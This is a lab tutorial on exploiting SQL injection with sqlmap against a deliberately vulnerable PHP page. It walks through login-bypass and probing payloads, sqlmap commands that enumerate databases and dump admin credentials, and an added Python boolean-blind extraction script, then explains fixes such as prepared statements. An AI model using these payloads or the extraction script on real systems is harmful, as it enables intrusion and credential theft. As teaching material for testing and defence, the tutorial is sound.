
Using sqlmap to exploit a SQL injection vulnerability

Published: 2024/9/30

There is a tool called sqlmap whose job is to detect and exploit SQL injection vulnerabilities; this post is a tutorial on how to use it.
Because SQL injection against systems you do not own is illegal, I test with two virtual machines of my own. Please do not attack other people's sites. (Most sites no longer have this kind of vulnerability today, and fixing it is simple.)

1. What is a SQL injection vulnerability

To understand SQL injection you first need to understand SQL statements. SQL (Structured Query Language) is a language used mainly to query databases. Databases commonly found on servers include Microsoft Access, MySQL and PostgreSQL; here I use MySQL. Some query examples follow.

SELECT * FROM admin WHERE user = "test" AND pass = "123456";

This looks up the records in the admin table whose user is test and whose pass is 123456 and returns the ones that match. A typical login page runs exactly this kind of query with the submitted username and password pasted into it.

But if the username is test and the password I type is " OR "1"="1, the statement becomes

SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";

The expression after WHERE is now true for every row ("1"="1" always holds, and the OR makes the whole condition true), so MySQL returns every record. The site takes the non-empty result as proof that the credentials were correct and logs you in, as test or as whichever account comes first in the result, depending on how the login code uses the rows. (MySQL accepts double quotes as string delimiters in its default SQL mode; the same payload with single quotes, ' OR '1'='1, works against any SQL database.)

If the site also has an administrator flag, try the password " OR "1"="1" AND writable = TRUE AND ""=" so that the query becomes

SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";

Because AND binds more tightly than OR, this parses as (user = "test" AND pass = "") OR ("1"="1" AND writable = TRUE AND ""=""). The left half is false as long as no account has an empty password, and "1"="1" and ""="" are always true, so the effective condition is just writable = TRUE and MySQL returns the records whose writable column is true. (The writable column is hypothetical; the lab database built in section 2 has no such column.)

Another common case is viewing an article, normally selected by a GET parameter id:

SELECT * FROM articles WHERE id = 1;

If the site does not validate id, test with id=1 AND 1=1:

SELECT * FROM articles WHERE id = 1 AND 1=1;

If the article still displays normally, the parameter may be injectable. Change it to id=1 AND 1=2: if the site now reports that the article was not found, that is further evidence, because your extra condition changed the query's result. Finally set id=" : if MySQL raises a syntax error and the site displays it, as most do, the parameter is almost certainly injectable. Note that id is pasted into the query unquoted, so the payloads need no quote characters at all; escaping quotes would not stop this injection.

I will use this example for the injection below.

2. Setting up the environment

I use Kali Linux 2017.3 as the attacker and Ubuntu 18.04 LTS as the victim server. Set up the server first (see the post "How to set up an Apache2 + PHP 5.6 + MySQL server on Ubuntu 18.04") and put the injectable page at /article.php with the following code.

<?php
// article.php: the vulnerable page. It uses the PHP 5 mysql_* extension
// (removed in PHP 7), which matches the PHP 5.6 server set up above.
if (!isset($_GET['id'])) {
    echo 'parameter id not set';
    die(1);
}
$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host, $user, $pass);
if (!$conn) {
    die('unable to connect to the database');
}
// The vulnerability is here: the raw GET parameter is concatenated into the query.
$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id'];
// On a malformed id, mysql_query() returns false and mysql_fetch_array() then emits
// a PHP warning; that warning is the error message the probe in section 3 looks for.
$query = mysql_query($sql, $conn);
$row = mysql_fetch_array($query);
if (!$row) {
    echo 'the requested article does not exist';
} else {
    echo $row['content'];
}
mysql_close($conn);
?>

Once the site is up, the database in MySQL looks like this:

[screenshot of the website database not reproduced in this copy]

Of course, the point of injecting is not to read the few articles, which I can read through the page anyway; the goal is private data, such as the accounts and passwords in the admin table.

3. Testing before injection

The server's address is 192.168.3.59. First open the page normally to see how it behaves, i.e. request http://192.168.3.59/article.php?id=1.

[screenshot of the normal page not reproduced in this copy]

The page itself works fine. Now test with id=" (http://192.168.3.59/article.php?id=").

MySQL finds a syntax error in the SQL, so the query returns no result and the page shows the error.

[screenshot of the error output not reproduced in this copy]

This matches the expectation from section 1 exactly, so the page can be injected. (For a more conclusive check, compare id=1 AND 1=1, which should still show the article, with id=1 AND 1=2, which should not.)

4. Injecting with sqlmap

On Kali Linux, sqlmap is installed by default.
On Ubuntu, install it with apt install sqlmap.
On other systems, download the source from the official site (http://sqlmap.org); sqlmap is written in Python, so Python may need to be installed first.
Now start the injection:

sqlmap -u '192.168.3.59/article.php?id=1'

The URL must include the GET parameter, otherwise sqlmap has no parameter to inject into. The output looks roughly like this:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:30:43

[11:30:43] [INFO] resuming back-end DBMS 'mysql'
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:30:43

The output shows that the target is injectable: sqlmap found three working techniques for the id parameter (boolean-based blind, time-based blind and a two-column UNION query). The lines "resuming back-end DBMS 'mysql'" and "resumed the following injection point(s) from stored session" mean sqlmap already had results for this target cached under /root/.sqlmap/output/192.168.3.59; on a first run you would see the detection phase instead. Now the injection proper begins, starting with the list of databases:

sqlmap -u '192.168.3.59/article.php?id=1' --dbs

The output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
[banner and legal disclaimer as in the first run]

[*] starting at 11:37:43

[11:37:43] [INFO] resuming back-end DBMS 'mysql'
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points as in the first run]
[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[*] information_schema
[*] website

[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:37:43

The injection finds two databases, information_schema and website. information_schema holds MySQL's own metadata about databases, tables and columns and is of no interest here; website holds the site's data, so that database is the next target:

sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables

The output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
[banner and legal disclaimer as in the first run]

[*] starting at 11:41:14

[11:41:14] [INFO] resuming back-end DBMS 'mysql'
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points as in the first run]
[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
+----------+
| admin    |
| articles |
+----------+

[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:41:14

There are two tables, admin and articles; an attacker will naturally go for admin:

sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns

The output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
[banner and legal disclaimer as in the first run]

[*] starting at 11:43:46

[11:43:46] [INFO] resuming back-end DBMS 'mysql'
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points as in the first run]
[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website
Table: admin
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| id     | int(11) |
| pass   | text    |
+--------+---------+

[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:43:47

The injection yields three columns, user, id and pass. Dumping user and pass gives the passwords (usually the login credentials for the site's admin back end):

sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump

The output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
[banner and legal disclaimer as in the first run]

[*] starting at 11:47:33

[11:47:33] [INFO] resuming back-end DBMS 'mysql'
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points as in the first run]
[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website
Table: admin
[3 entries]
+-------+--------+
| user  | pass   |
+-------+--------+
| test1 | 123456 |
| test2 | 123456 |
| test3 | 123456 |
+-------+--------+

[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:47:33

The administrator accounts and passwords have been obtained, and the injection ends here. Note that this lab stores passwords in clear text, which is why the dump hands over usable credentials directly; a site that stored password hashes would leave the attacker with an extra cracking step.
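What sqlmap automated in the steps above is a long series of yes/no questions put to the page. The script below is an added example, neither sqlmap's code nor part of the original post: it implements the "boolean-based blind" technique that sqlmap listed for the id parameter against a simulated article.php backed by an in-memory SQLite copy of the lab tables (constructed data). It recovers the admin passwords using nothing but "article found" versus "article not found" responses, the same data the --dump step printed. SQLite's unicode(), substr() and length() stand in for MySQL's ORD(), SUBSTRING() and LENGTH(); the request counter is there only to make the cost visible.

```python
import sqlite3

# Constructed stand-in for the lab server: an in-memory SQLite database with
# the same website.admin and website.articles contents the page dumps.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE admin (id INTEGER, user TEXT, pass TEXT);
    INSERT INTO admin VALUES (1, 'test1', '123456');
    INSERT INTO admin VALUES (2, 'test2', '123456');
    INSERT INTO admin VALUES (3, 'test3', '123456');
    CREATE TABLE articles (id INTEGER, content TEXT);
    INSERT INTO articles VALUES (1, 'first article');
    INSERT INTO articles VALUES (2, 'second article');
""")
REQUESTS = 0   # number of simulated HTTP requests sent to article.php


def article_page(id_param):
    """Simulates article.php: id is concatenated unchecked; returns the page body."""
    global REQUESTS
    REQUESTS += 1
    try:
        row = DB.execute("SELECT content FROM articles WHERE id = " + id_param).fetchone()
    except sqlite3.OperationalError:
        return "MySQL error"            # the real page emits a PHP warning here
    return row[0] if row else "the requested article does not exist"


BASELINE = article_page("1")            # what an untampered request looks like


def oracle(condition):
    """One boolean-blind probe: does 'id=1 AND (condition)' still show article 1?
    (sqlmap's time-based variant would use 'AND SLEEP(5)' and measure the delay.)"""
    return article_page("1 AND (" + condition + ")") == BASELINE


def blind_length(subquery, max_len=64):
    """Finds the length of the string a subquery returns, one probe per candidate."""
    for n in range(max_len + 1):
        if oracle(f"length(({subquery})) = {n}"):
            return n
    raise ValueError("value longer than max_len")


def blind_extract(subquery):
    """Recovers the string returned by subquery one character at a time, with a
    binary search over the 7-bit ASCII range: 7 probes per character."""
    value = ""
    for i in range(1, blind_length(subquery) + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    # The same rows sqlmap's --dump step printed, rebuilt from yes/no answers only.
    for user in ("test1", "test2", "test3"):
        print(user, blind_extract(f"SELECT pass FROM admin WHERE user = '{user}'"))
    print("simulated requests:", REQUESTS)
```

Each character costs seven requests on top of the length search, which is why sqlmap uses the faster UNION technique it also found whenever the page reflects query output, and falls back to boolean-based or time-based blind extraction only when it does not.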

5. How to fix the SQL injection vulnerability

Take the page from this post as the example. Before the fix it is the article.php listed in section 2, whose marked line concatenates $_GET['id'] straight into the query string.

The root cause is that the untrusted id parameter is concatenated directly into the SQL string, so characters and keywords with SQL meaning change the structure of the query. There are several ways to fix it:

  • Validate the parameter, for example check that id is an integer (in PHP, ctype_digit($_GET['id']) or an (int) cast) before it reaches the query.
  • Escape string values where quotes really are needed. PHP's addslashes is the commonly suggested function, but it does not know the connection's character set; mysql_real_escape_string (or its mysqli equivalent) is the safer choice. Note that escaping does nothing for this page, because id is not quoted in the query.
  • Better than either: prepared statements with bound parameters (PDO or mysqli), which keep the data out of the query text entirely.
  • Install an off-the-shelf protection product. I do not know how these work, but many sites seem to run something like D盾.
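The following Python script is an added example, not code from the original post. It reproduces sections 1, 3 and 5 against an in-memory SQLite database: the concatenated login and article queries, the three outcomes (normal, not found, SQL error) that the manual test in section 3 distinguishes, and the validated and parameterized versions that close the hole. The table contents are constructed to match the lab; the writable column is an assumption added for the precedence example in section 1. Single quotes replace the page's double quotes because SQLite does not accept double-quoted strings.

```python
import re
import sqlite3


def setup_db():
    """Constructed in-memory stand-in for the page's website database. The
    writable column is an assumption added for the section 1 example; the
    lab's real admin table has only id, user and pass."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin (id INTEGER, user TEXT, pass TEXT, writable INTEGER);
        INSERT INTO admin VALUES (1, 'test1', '123456', 1);
        INSERT INTO admin VALUES (2, 'test2', '123456', 0);
        INSERT INTO admin VALUES (3, 'test3', '123456', 0);
        CREATE TABLE articles (id INTEGER, content TEXT);
        INSERT INTO articles VALUES (1, 'first article');
        INSERT INTO articles VALUES (2, 'second article');
    """)
    return conn


def vulnerable_login(conn, user, password):
    """The login query from section 1, built by string concatenation. Returns
    the user names of all matching rows, sorted so the result is deterministic."""
    sql = ("SELECT user FROM admin WHERE user = '" + user
           + "' AND pass = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def safe_login(conn, user, password):
    """Same lookup with bound parameters: the driver sends the values separately
    from the statement, so quotes inside them never alter the query's structure."""
    sql = "SELECT user FROM admin WHERE user = ? AND pass = ?"
    return sorted(row[0] for row in conn.execute(sql, (user, password)))


def probe_article(conn, id_param):
    """Equivalent of the page's article.php: id is pasted in unquoted. Returns
    one of the three outcomes the manual test in section 3 distinguishes."""
    sql = "SELECT content FROM articles WHERE id = " + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "sql error"        # article.php shows a PHP/MySQL warning here
    return "found" if rows else "not found"


def safe_article(conn, id_param):
    """Fixed lookup: whitelist the parameter as a plain decimal integer, then
    bind it. Either measure on its own already stops the payloads above."""
    if not re.fullmatch(r"[0-9]+", id_param):
        return "rejected"
    sql = "SELECT content FROM articles WHERE id = ?"
    row = conn.execute(sql, (int(id_param),)).fetchone()
    return row[0] if row else "not found"


if __name__ == "__main__":
    db = setup_db()
    # Login bypass: every account, then only the 'writable' one (precedence trick).
    print(vulnerable_login(db, "test", "' OR '1'='1"))
    print(vulnerable_login(db, "test", "' OR '1'='1' AND writable = 1 AND ''='"))
    print(safe_login(db, "test", "' OR '1'='1"))
    # The section 3 probe sequence, vulnerable page beside the fixed one.
    for payload in ("1", "1 AND 1=1", "1 AND 1=2", '"'):
        print(repr(payload), probe_article(db, payload), "|", safe_article(db, payload))
```

The probe results are the signal both a human tester and sqlmap rely on: a payload that is syntactically valid but logically false changes the page from "found" to "not found", while a payload that breaks the syntax produces an error. The fixed version answers "rejected" to anything that is not a bare integer, so none of those signals exist any more.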

6. In practice

In practice, SQL injection is not always this simple. Sometimes table names have to be guessed with a wordlist (Kali ships with wordlists); sometimes the injection fails altogether (possibly because the wordlist is not good enough); and even when the injection succeeds and yields a password, there may be no login page to be found (it is usually in an admin or login directory). So this post only shows one method and cannot guarantee a successful injection; I hope it is useful all the same.
